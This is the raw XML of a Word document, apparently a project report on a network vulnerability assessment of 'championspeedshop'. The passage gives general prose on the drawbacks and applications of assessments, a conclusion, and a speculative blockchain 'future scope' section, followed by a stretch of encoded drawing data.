          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disruption to Operations: Some vulnerability assessment procedures involve active scanning or testing techniques that may disrupt network operations. This disruption could potentially impact critical systems or cause false alarms, leading to unnecessary downtime or loss of productivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969C050" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRPr="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1689F77E" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1D31">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Incomplete Assessments: The accuracy and effectiveness of vulnerability assessments depend on the expertise and knowledge of the individuals conducting them. Inadequate training or limited knowledge of the assessment tools and techniques could result in incomplete assessments and missed vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38A373" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AA4CE95" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C730CC3" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8B537B" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E6C4D" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>APPLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC0F96" w14:textId="77777777" w:rsidR="000B1D31" w:rsidRDefault="000B1D31" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49228170" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="000B1D31">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3F1C4A" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Risk Management: Vulnerability assessments help organizations identify potential risks and vulnerabilities within their network infrastructure. By assessing and understanding these risks, organizations can implement appropriate security controls and mitigation strategies to reduce the likelihood and impact of security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2CFB62" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB4906E" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Compliance and Regulatory Requirements: Many industries and regulatory bodies have specific security standards and compliance requirements. Network vulnerability assessments play a crucial role in meeting these requirements. Assessments help organizations identify vulnerabilities and ensure compliance with industry-specific regulations such as Payment Card Industry Data Security Standard (PCI DSS) or the Health Insurance Portability and Accountability Act (HIPAA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69159DC8" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D52E8FB" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Audits: Vulnerability assessments are often part of security audits, where organizations evaluate the effectiveness of their security measures and identify areas for improvement. These audits may be conducted internally or by third-party security professionals to provide an objective assessment of the network's security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C0D187" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30331B0F" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Incident Response Planning: Vulnerability assessments can contribute to effective incident response planning. By identifying vulnerabilities in advance, organizations can develop incident response strategies and procedures to mitigate the impact of potential security breaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1E165" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B363C2D" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Design and Architecture: Vulnerability assessments can assist in the design and architecture of secure networks. By conducting assessments during the planning phase, organizations can identify potential vulnerabilities and implement appropriate security measures in the network's design.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D88B6" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="345600BE" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306CDF43" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BDCA99B" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB34071" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CFC5A90" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431C934C" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F66132" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0782EA42" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F90A594" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2907B016" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C991D7" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441621BD" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7F9A82" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043A0A41" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A8175C" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CB452" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB7493D" w14:textId="4DDDC508" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In conclusion, the network vulnerability assessment conducted on </w:t>
      </w:r>
      <w:r w:rsidR="00F264F7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>championspeedshop</w:t>
      </w:r>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'s network infrastructure has provided valuable insights into the security posture and potential vulnerabilities present. The assessment aimed to identify and mitigate risks, enhance security measures, and ensure compliance with relevant regulations and standards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81B487" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F7732F" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Throughout the assessment, a comprehensive evaluation of the network's security was performed, encompassing various procedures, including vulnerability scanning, penetration testing, and analysis of security controls. The assessment identified several vulnerabilities, ranging from low to high severity, that require immediate attention and remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600AD19A" w14:textId="77777777" w:rsidR="00736C51" w:rsidRPr="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25268EE0" w14:textId="77777777" w:rsidR="00736C51" w:rsidRDefault="00736C51" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment has enabled the organization to prioritize resources and focus on addressing critical vulnerabilities that pose the most significant risks to the network infrastructure. By implementing appropriate security measures and mitigation strategies, </w:t>
      </w:r>
      <w:r w:rsidR="00F264F7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">championspeedshop </w:t>
      </w:r>
      <w:r w:rsidRPr="00736C51">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can significantly reduce the likelihood and impact of potential security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E40C294" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7A951F" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40047CF0" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DB92FC" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A29E53" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00927343">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0824A" w14:textId="2FFB34CE" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00927343">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FUTURE SCOPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3BA3D" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00927343">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC7D399" w14:textId="77777777" w:rsidR="00927343" w:rsidRDefault="00927343" w:rsidP="00927343">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1567968D" w14:textId="77777777" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336E0D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The use of blockchain technology in network vulnerability assessment shows promising potential for enhancing the security and effectiveness of the assessment process. Here are some future scopes and possibilities regarding the use of blockchain in network vulnerability assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42074E81" w14:textId="77777777" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5B75F1" w14:textId="77777777" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336E0D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Immutable and Trustworthy Vulnerability Records: Blockchain's inherent characteristics, such as immutability and tamper-proof nature, can be leveraged to create a decentralized and secure repository for storing vulnerability records. By utilizing blockchain, vulnerability assessment findings can be securely recorded, ensuring the integrity and trustworthiness of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8788B" w14:textId="77777777" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC525BE" w14:textId="77777777" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336E0D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Secure Vulnerability Disclosure and Reporting: Blockchain can provide a secure and transparent platform for vulnerability disclosure and reporting. By utilizing smart contracts, security researchers can securely report vulnerabilities and receive rewards or acknowledgments, while maintaining anonymity if desired. This can incentivize ethical hacking and contribute to a more collaborative and secure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F45BB2B" w14:textId="77777777" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D85E017" w14:textId="312A55F6" w:rsidR="00927343" w:rsidRPr="00336E0D" w:rsidRDefault="00927343" w:rsidP="00336E0D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00336E0D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Secure Vulnerability Patching and Updates: Blockchain-based solutions can facilitate secure distribution and verification of vulnerability patches and updates. By utilizing blockchain for tracking and validating patches, organizations can ensure the authenticity and integrity of updates, minimizing the risk of malicious code injection or unauthorized modifications during the patching process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41874F48" w14:textId="1E012B62" w:rsidR="00927343" w:rsidRPr="00736C51" w:rsidRDefault="00927343" w:rsidP="00736C51">
      <w:pPr>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00927343" w:rsidRPr="00736C51" w:rsidSect="00336E0D">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="88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82ED6AF" w14:textId="450FC235" w:rsidR="00A778D5" w:rsidRDefault="00445FE1" w:rsidP="00C6408B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15732224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10F80717" wp14:editId="7D1AE51D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>88265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>7267575</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="28575" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2105641930"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0"/>
                        </a:xfrm>
                        <a:prstGeom prst="line">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="FDFDFD"/>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214FC" id="Line 2" o:spid="_x0000_s1026" style="position:absolute;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5pt,572.25pt" to="9.2pt,5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0urwEAAEcDAAAOAAAAZHJzL2Uyb0RvYy54bWysUsFuGyEQvVfqPyDu9a4tpYlWXudg172k&#10;raUkHzAGdheVZdAM9tp/XyC2G7W3qkJCDDPzeO8xy8fT6MTREFv0rZzPaimMV6it71v5+rL99CAF&#10;R/AaHHrTyrNh+bj6+GE5hcYscECnDYkE4rmZQiuHGENTVawGMwLPMBifkh3SCDGF1FeaYEroo6sW&#10;df25mpB0IFSGOd1u3pJyVfC7zqj4o+vYROFambjFslPZ93mvVktoeoIwWHWhAf/AYgTr06M3qA1E&#10;EAeyf0GNVhEydnGmcKyw66wyRUNSM6//UPM8QDBFSzKHw80m/n+w6vtx7XeUqauTfw5PqH6y8Lge&#10;wPemEHg5h/Rx82xVNQVubi054LAjsZ++oU41cIhYXDh1NGbIpE+citnnm9nmFIVKl4uHu/s7KdQ1&#10;U0FzbQvE8avBUeRDK5312QVo4PjEMdOA5lqSrz1urXPlJ50XU+K6uK/r0sHorM7ZXMfU79eOxBHS&#10;MGw3eRVRKfO+jPDgdUEbDOgvl3ME697O6XXnL15k+XnWuNmjPu/o6lH6rULzMll5HN7Hpfv3/K9+&#10;AQAA//8DAFBLAwQUAAYACAAAACEAscO//t0AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPMU/D&#10;MBCFdyT+g3VIbNRJCahN41SAWiY60GZgdOMjjojPUey04d9zHRBMp3f39O57xXpynTjhEFpPCtJZ&#10;AgKp9qalRkF12N4tQISoyejOEyr4xgDr8vqq0LnxZ3rH0z42gkMo5FqBjbHPpQy1RafDzPdIfPv0&#10;g9OR5dBIM+gzh7tOzpPkUTrdEn+wuscXi/XXfnQK8O11e5jmVXgePjY07tKNHWWl1O3N9LQCEXGK&#10;f2a44DM6lMx09COZIDrW90t28kyz7AHExbHIQBx/N7Is5P8O5Q8AA